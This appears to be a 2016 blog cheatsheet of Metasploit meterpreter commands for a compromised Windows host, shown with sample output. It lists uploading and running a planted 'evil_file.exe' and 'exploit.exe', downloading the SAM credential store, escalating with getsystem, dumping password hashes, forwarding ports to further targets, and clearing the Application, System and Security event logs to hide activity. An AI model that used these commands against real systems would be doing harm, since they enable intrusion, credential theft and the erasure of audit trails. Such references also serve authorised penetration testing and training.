29 Aug 2016, 16:22

meterpreter cheatsheet

Useful commands in Metasploit when spawning meterpreter shells.

uploading a file to a windows host

meterpreter > upload evil_file.exe c:\\windows\\system32
[*] uploading  : evil_file.exe -> c:\windows\system32
[*] uploaded   : evil_file.exe -> c:\windows\system32\evil_file.exe
meterpreter >

downloading a file from a windows host

meterpreter> download c:\\windows\\repair\\sam /tmp

executing uploaded executable on windows target

meterpreter> execute -f c:\\windows\temp\exploit.exe

creatnig a new channel with cmd.exe

meterpreter> execute -f cmd -c

show running processes

meterpreter> ps

open a shell inside a meterpreter session

meterpreter> shell

meterpreter automatic system priviledges

meterpreter> getsystem

meterpreter automatic hash dump attempt

meterpreter> hashdump

meterpreter create port forward to another target host

meterpreter> portfwd add –l 80 –p 80 –r <target>

meterpreter> portfwd delete –l 80 –p 80 –r <target>

push meterpreter session to background

meterpreter> background

read text files

meterpreter> cat file.txt

list current working directory on remote host

meterpreter> pwd

c:\windows

clear event logs on remote system (clears Application, System and Security event logs)

meterpreter> clearev

getting the current user that meterpreter is running as

meterpreter> getuid

idle time of a system

meterpreter > idletime
User has been idle for: 2 hours 14 mins 5 secs
meterpreter >

looking at network information

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

INTEL PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0dc:21:11:f1:11
IP Address  : 192.168.0.1
Netmask     : 255.255.255.0

meterpreter >